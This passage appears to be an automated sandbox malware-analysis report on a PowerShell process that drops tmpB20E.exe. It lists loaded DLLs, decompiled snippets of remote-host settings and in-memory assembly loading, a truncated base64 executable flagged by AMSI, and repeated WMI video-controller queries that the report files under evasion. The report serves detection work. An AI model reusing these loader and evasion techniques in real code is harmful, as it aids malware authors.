              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

              Data Obfuscation

              barindex
              Source: tmpB20E.exe.1.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: tmpB20E.exe.1.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
              Source: tmpB20E.exe.1.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: tmpB20E.exe.1.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: tmpB20E.exe.1.dr, Messages.cs.Net Code: Memory
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
              Source: 1.2.powershell.exe.1e40029eb40.0.raw.unpack, Messages.cs.Net Code: Memory
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAD
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeCode function: 4_2_00007FFAAC5B782F pushfd ; retf 4_2_00007FFAAC5B785E
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeCode function: 4_2_00007FFAAC5B780F pushad ; retf 4_2_00007FFAAC5B782E
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeCode function: 4_2_00007FFAAC5B785F pushad ; retf 4_2_00007FFAAC5B782E
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB20E.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\tmpB20E.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
